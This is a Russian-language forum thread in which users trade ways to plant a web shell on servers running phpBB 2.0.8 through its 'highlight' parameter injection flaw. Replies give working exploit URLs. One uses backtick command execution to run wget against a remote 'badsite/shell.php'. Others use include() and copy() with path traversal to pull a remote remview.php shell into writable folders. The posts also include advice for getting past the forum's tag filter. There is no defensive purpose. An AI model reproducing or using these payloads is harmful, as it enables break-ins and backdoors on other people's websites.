|
Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group
Люди, подскажите плизз.... буду очень признателен:
вот когда я хочу скатать шелл на сервер, используя: http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527 мне в ответ пишет: he html tags you attempted to use are not allowed [ Go Back ] Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group |
можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://badsite/shell.php или: viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://badsite/shell.php`.%2527 может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =) |
Цитата:
|
а у меня вообще пишет что такой темы нет :confused:
|
Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums
И не одна из этих комманд чтобы залить шелл не действует!!! Пишет либо - модуль не активен, либо ошибку Денвера!!! Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group |
поробуй выполнить команды так:
Цитата:
|
а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"
и еще, Цитата:
viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 ??????? типо этого? b=../../db/ а что вместо точек писать? полный путь? где находиться папка? в таком случае как именно? что брать за корневой католог? forum/db/ или полный путь /usr/home/public_html/forum не понятно всё это... P.S. ведь drwxrwxrwx - это открытая папка на запись. |
да не геморься ты, лучше залей обычным wget'ом и потом скопируй...
|
Цитата:
The html tags you attempted to use are not allowed [ Go Back ] Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group |
Эй ну что кто нибудь встречал такую проблему??
|
| Время: 00:01 |